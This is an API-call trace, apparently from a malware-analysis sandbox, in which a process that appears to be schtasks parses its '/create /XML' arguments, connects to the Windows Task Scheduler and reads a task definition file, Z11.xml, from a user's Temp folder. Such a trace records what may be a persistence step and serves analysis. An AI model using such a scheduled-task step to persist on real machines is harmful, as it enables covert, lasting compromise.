[0220.604] StrStrIW (lpFirst="|ri|", lpSrch="|f|") returned 0x0
[0220.604] SetLastError (dwErrCode=0x490)
[0220.604] lstrlenW (lpString="z") returned 1
[0220.604] lstrlenW (lpString="z") returned 1
[0220.604] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.604] lstrlenW (lpString="f") returned 1
[0220.604] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.605] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|z|") returned 3
[0220.605] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.605] lstrlenW (lpString="|z|") returned 3
[0220.605] lstrlenW (lpString="|f|") returned 3
[0220.605] StrStrIW (lpFirst="|z|", lpSrch="|f|") returned 0x0
[0220.605] SetLastError (dwErrCode=0x490)
[0220.605] lstrlenW (lpString="f") returned 1
[0220.605] lstrlenW (lpString="f") returned 1
[0220.605] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.605] lstrlenW (lpString="f") returned 1
[0220.605] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.605] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.605] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.606] lstrlenW (lpString="|f|") returned 3
[0220.606] lstrlenW (lpString="|f|") returned 3
[0220.606] StrStrIW (lpFirst="|f|", lpSrch="|f|") returned="|f|"
[0220.606] SetLastError (dwErrCode=0x0)
[0220.606] SetLastError (dwErrCode=0x0)
[0220.606] SetLastError (dwErrCode=0x0)
[0220.606] lstrlenW (lpString="/XML") returned 4
[0220.606] lstrlenW (lpString="-/") returned 2
[0220.606] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0220.606] lstrlenW (lpString="create") returned 6
[0220.606] lstrlenW (lpString="create") returned 6
[0220.606] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.606] lstrlenW (lpString="XML") returned 3
[0220.606] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.607] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|create|") returned 8
[0220.607] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.607] lstrlenW (lpString="|create|") returned 8
[0220.607] lstrlenW (lpString="|XML|") returned 5
[0220.607] StrStrIW (lpFirst="|create|", lpSrch="|XML|") returned 0x0
[0220.607] SetLastError (dwErrCode=0x490)
[0220.607] lstrlenW (lpString="?") returned 1
[0220.607] lstrlenW (lpString="?") returned 1
[0220.607] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.607] lstrlenW (lpString="XML") returned 3
[0220.607] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.607] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|?|") returned 3
[0220.608] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.608] lstrlenW (lpString="|?|") returned 3
[0220.608] lstrlenW (lpString="|XML|") returned 5
[0220.608] SetLastError (dwErrCode=0x490)
[0220.608] lstrlenW (lpString="s") returned 1
[0220.608] lstrlenW (lpString="s") returned 1
[0220.608] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.608] lstrlenW (lpString="XML") returned 3
[0220.608] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.608] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|s|") returned 3
[0220.608] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.608] lstrlenW (lpString="|s|") returned 3
[0220.608] lstrlenW (lpString="|XML|") returned 5
[0220.609] SetLastError (dwErrCode=0x490)
[0220.609] lstrlenW (lpString="u") returned 1
[0220.609] lstrlenW (lpString="u") returned 1
[0220.609] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.609] lstrlenW (lpString="XML") returned 3
[0220.609] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.609] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|u|") returned 3
[0220.609] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.609] lstrlenW (lpString="|u|") returned 3
[0220.609] lstrlenW (lpString="|XML|") returned 5
[0220.609] SetLastError (dwErrCode=0x490)
[0220.609] lstrlenW (lpString="p") returned 1
[0220.609] lstrlenW (lpString="p") returned 1
[0220.609] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.610] lstrlenW (lpString="XML") returned 3
[0220.610] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.610] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|p|") returned 3
[0220.610] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.610] lstrlenW (lpString="|p|") returned 3
[0220.610] lstrlenW (lpString="|XML|") returned 5
[0220.610] SetLastError (dwErrCode=0x490)
[0220.610] lstrlenW (lpString="ru") returned 2
[0220.610] lstrlenW (lpString="ru") returned 2
[0220.610] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.610] lstrlenW (lpString="XML") returned 3
[0220.610] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.610] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|ru|") returned 4
[0220.611] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.611] lstrlenW (lpString="|ru|") returned 4
[0220.611] lstrlenW (lpString="|XML|") returned 5
[0220.611] SetLastError (dwErrCode=0x490)
[0220.611] lstrlenW (lpString="rp") returned 2
[0220.611] lstrlenW (lpString="rp") returned 2
[0220.611] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.611] lstrlenW (lpString="XML") returned 3
[0220.611] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.611] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|rp|") returned 4
[0220.611] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.611] lstrlenW (lpString="|rp|") returned 4
[0220.611] lstrlenW (lpString="|XML|") returned 5
[0220.611] SetLastError (dwErrCode=0x490)
[0220.612] lstrlenW (lpString="sc") returned 2
[0220.612] lstrlenW (lpString="sc") returned 2
[0220.612] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.612] lstrlenW (lpString="XML") returned 3
[0220.612] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.612] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|sc|") returned 4
[0220.612] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.612] lstrlenW (lpString="|sc|") returned 4
[0220.612] lstrlenW (lpString="|XML|") returned 5
[0220.612] SetLastError (dwErrCode=0x490)
[0220.612] lstrlenW (lpString="mo") returned 2
[0220.612] lstrlenW (lpString="mo") returned 2
[0220.612] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.613] lstrlenW (lpString="XML") returned 3
[0220.613] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.613] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|mo|") returned 4
[0220.613] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.613] lstrlenW (lpString="|mo|") returned 4
[0220.613] lstrlenW (lpString="|XML|") returned 5
[0220.613] SetLastError (dwErrCode=0x490)
[0220.613] lstrlenW (lpString="d") returned 1
[0220.613] lstrlenW (lpString="d") returned 1
[0220.613] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.613] lstrlenW (lpString="XML") returned 3
[0220.613] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.614] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|d|") returned 3
[0220.614] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.614] lstrlenW (lpString="|d|") returned 3
[0220.614] lstrlenW (lpString="|XML|") returned 5
[0220.614] SetLastError (dwErrCode=0x490)
[0220.614] lstrlenW (lpString="m") returned 1
[0220.614] lstrlenW (lpString="m") returned 1
[0220.614] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.614] lstrlenW (lpString="XML") returned 3
[0220.614] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.614] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|m|") returned 3
[0220.614] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.614] lstrlenW (lpString="|m|") returned 3
[0220.614] lstrlenW (lpString="|XML|") returned 5
[0220.615] SetLastError (dwErrCode=0x490)
[0220.615] lstrlenW (lpString="i") returned 1
[0220.615] lstrlenW (lpString="i") returned 1
[0220.615] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.615] lstrlenW (lpString="XML") returned 3
[0220.615] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.615] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|i|") returned 3
[0220.615] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.615] lstrlenW (lpString="|i|") returned 3
[0220.615] lstrlenW (lpString="|XML|") returned 5
[0220.615] SetLastError (dwErrCode=0x490)
[0220.615] lstrlenW (lpString="tn") returned 2
[0220.615] lstrlenW (lpString="tn") returned 2
[0220.615] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.616] lstrlenW (lpString="XML") returned 3
[0220.616] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.616] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|tn|") returned 4
[0220.616] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.616] lstrlenW (lpString="|tn|") returned 4
[0220.616] lstrlenW (lpString="|XML|") returned 5
[0220.616] SetLastError (dwErrCode=0x490)
[0220.616] lstrlenW (lpString="tr") returned 2
[0220.616] lstrlenW (lpString="tr") returned 2
[0220.616] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.616] lstrlenW (lpString="XML") returned 3
[0220.616] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.617] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|tr|") returned 4
[0220.617] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.617] lstrlenW (lpString="|tr|") returned 4
[0220.617] lstrlenW (lpString="|XML|") returned 5
[0220.617] SetLastError (dwErrCode=0x490)
[0220.617] lstrlenW (lpString="st") returned 2
[0220.617] lstrlenW (lpString="st") returned 2
[0220.617] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.743] lstrlenW (lpString="XML") returned 3
[0220.743] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.743] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|st|") returned 4
[0220.743] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.743] lstrlenW (lpString="|st|") returned 4
[0220.743] lstrlenW (lpString="|XML|") returned 5
[0220.743] SetLastError (dwErrCode=0x490)
[0220.743] lstrlenW (lpString="sd") returned 2
[0220.743] lstrlenW (lpString="sd") returned 2
[0220.743] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.744] lstrlenW (lpString="XML") returned 3
[0220.744] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.744] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|sd|") returned 4
[0220.744] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.744] lstrlenW (lpString="|sd|") returned 4
[0220.744] lstrlenW (lpString="|XML|") returned 5
[0220.744] SetLastError (dwErrCode=0x490)
[0220.744] lstrlenW (lpString="ed") returned 2
[0220.744] lstrlenW (lpString="ed") returned 2
[0220.744] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.744] lstrlenW (lpString="XML") returned 3
[0220.744] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.744] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|ed|") returned 4
[0220.745] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.745] lstrlenW (lpString="|ed|") returned 4
[0220.745] lstrlenW (lpString="|XML|") returned 5
[0220.745] SetLastError (dwErrCode=0x490)
[0220.745] lstrlenW (lpString="it") returned 2
[0220.745] lstrlenW (lpString="it") returned 2
[0220.745] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.745] lstrlenW (lpString="XML") returned 3
[0220.745] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.745] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|it|") returned 4
[0220.745] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.745] lstrlenW (lpString="|it|") returned 4
[0220.745] lstrlenW (lpString="|XML|") returned 5
[0220.745] SetLastError (dwErrCode=0x490)
[0220.746] lstrlenW (lpString="et") returned 2
[0220.746] lstrlenW (lpString="et") returned 2
[0220.746] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.746] lstrlenW (lpString="XML") returned 3
[0220.746] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.746] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|et|") returned 4
[0220.746] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.746] lstrlenW (lpString="|et|") returned 4
[0220.746] lstrlenW (lpString="|XML|") returned 5
[0220.746] SetLastError (dwErrCode=0x490)
[0220.746] lstrlenW (lpString="k") returned 1
[0220.746] lstrlenW (lpString="k") returned 1
[0220.746] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.746] lstrlenW (lpString="XML") returned 3
[0220.747] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.747] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|k|") returned 3
[0220.747] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.747] lstrlenW (lpString="|k|") returned 3
[0220.747] lstrlenW (lpString="|XML|") returned 5
[0220.747] SetLastError (dwErrCode=0x490)
[0220.747] lstrlenW (lpString="du") returned 2
[0220.747] lstrlenW (lpString="du") returned 2
[0220.747] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.747] lstrlenW (lpString="XML") returned 3
[0220.747] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.747] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|du|") returned 4
[0220.747] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.748] lstrlenW (lpString="|du|") returned 4
[0220.748] lstrlenW (lpString="|XML|") returned 5
[0220.748] SetLastError (dwErrCode=0x490)
[0220.748] lstrlenW (lpString="ri") returned 2
[0220.748] lstrlenW (lpString="ri") returned 2
[0220.748] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.748] lstrlenW (lpString="XML") returned 3
[0220.748] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.748] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|ri|") returned 4
[0220.748] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.748] lstrlenW (lpString="|ri|") returned 4
[0220.748] lstrlenW (lpString="|XML|") returned 5
[0220.748] SetLastError (dwErrCode=0x490)
[0220.748] lstrlenW (lpString="z") returned 1
[0220.748] lstrlenW (lpString="z") returned 1
[0220.749] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.749] lstrlenW (lpString="XML") returned 3
[0220.749] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.749] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|z|") returned 3
[0220.749] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.749] lstrlenW (lpString="|z|") returned 3
[0220.749] lstrlenW (lpString="|XML|") returned 5
[0220.749] SetLastError (dwErrCode=0x490)
[0220.749] lstrlenW (lpString="f") returned 1
[0220.749] lstrlenW (lpString="f") returned 1
[0220.749] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.749] lstrlenW (lpString="XML") returned 3
[0220.750] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.750] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.750] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.750] lstrlenW (lpString="|f|") returned 3
[0220.750] lstrlenW (lpString="|XML|") returned 5
[0220.750] SetLastError (dwErrCode=0x490)
[0220.750] lstrlenW (lpString="v1") returned 2
[0220.750] lstrlenW (lpString="v1") returned 2
[0220.750] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.750] lstrlenW (lpString="XML") returned 3
[0220.750] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.750] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|v1|") returned 4
[0220.751] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.751] lstrlenW (lpString="|v1|") returned 4
[0220.751] lstrlenW (lpString="|XML|") returned 5
[0220.751] SetLastError (dwErrCode=0x490)
[0220.751] lstrlenW (lpString="xml") returned 3
[0220.751] lstrlenW (lpString="xml") returned 3
[0220.751] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.751] lstrlenW (lpString="XML") returned 3
[0220.751] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.751] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|xml|") returned 5
[0220.751] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.751] lstrlenW (lpString="|xml|") returned 5
[0220.751] lstrlenW (lpString="|XML|") returned 5
[0220.751] StrStrIW (lpFirst="|xml|", lpSrch="|XML|") returned="|xml|"
[0220.751] SetLastError (dwErrCode=0x0)
[0220.751] SetLastError (dwErrCode=0x0)
[0220.752] lstrlenW (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml") returned 44
[0220.752] lstrlenW (lpString="-/") returned 2
[0220.752] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0
[0220.752] SetLastError (dwErrCode=0x490)
[0220.752] SetLastError (dwErrCode=0x490)
[0220.752] SetLastError (dwErrCode=0x0)
[0220.752] lstrlenW (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml") returned 44
[0220.752] StrChrIW (lpStart="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml", wMatch=0x3a) returned=":\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml"
[0220.752] lstrlenW (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml") returned 44
[0220.752] _memicmp (_Buf1=0x2ec440, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.752] _memicmp (_Buf1=0x2ed670, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.752] SetLastError (dwErrCode=0x7a)
[0220.752] SetLastError (dwErrCode=0x0)
[0220.752] SetLastError (dwErrCode=0x0)
[0220.752] lstrlenW (lpString="C") returned 1
[0220.753] SetLastError (dwErrCode=0x490)
[0220.753] SetLastError (dwErrCode=0x0)
[0220.753] lstrlenW (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml") returned 44
[0220.753] lstrlenW (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml") returned 44
[0220.753] GetProcessHeap () returned 0x2d0000
[0220.753] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x5a) returned 0x2ec480
[0220.753] SetLastError (dwErrCode=0x0)
[0220.753] lstrlenW (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml") returned 44
[0220.753] SetLastError (dwErrCode=0x0)
[0220.753] GetProcessHeap () returned 0x2d0000
[0220.754] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x1fc) returned 0x2ec4f0
[0220.915] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0221.197] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
[0221.572] CoCreateInstance (in: rclsid=0xffe21ae0*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xffe21ad0*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18ca60 | out: ppv=0x18ca60*=0xd5a70) returned 0x0
[0221.716] TaskScheduler:ITaskService:Connect (This=0xd5a70, serverName=0x18cb40*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), user=0x18cb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x32524553524150), domain=0x18cb20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0x18cae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc0, varVal2=0x1)) returned 0x0
[0221.842] TaskScheduler:IUnknown:AddRef (This=0xd5a70) returned 0x2
[0221.842] TaskScheduler:ITaskService:GetFolder (in: This=0xd5a70, Path=0x0, ppFolder=0x18cbf8 | out: ppFolder=0x18cbf8*=0xd5b20) returned 0x0
[0221.845] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\z11.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0xf4
[0221.846] GetFileSizeEx (in: hFile=0xf4, lpFileSize=0x18c3f0 | out: lpFileSize=0x18c3f0*=1788) returned 1
[0221.846] ReadFile (in: hFile=0xf4, lpBuffer=0x18c430, nNumberOfBytesToRead=0x2, lpNumberOfBytesRead=0x18c438, lpOverlapped=0x0 | out: lpBuffer=0x18c430*, lpNumberOfBytesRead=0x18c438*=0x2, lpOverlapped=0x0) returned 1
[0221.848] SetFilePointer (in: hFile=0xf4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
[0221.848] malloc (_Size=0x6fd) returned 0xd5fd0
[0221.848] ReadFile (in: hFile=0xf4, lpBuffer=0xd5fd0, nNumberOfBytesToRead=0x6fd, lpNumberOfBytesRead=0x18c438, lpOverlapped=0x0 | out: lpBuffer=0xd5fd0*, lpNumberOfBytesRead=0x18c438*=0x6fc, lpOverlapped=0x0) returned 1
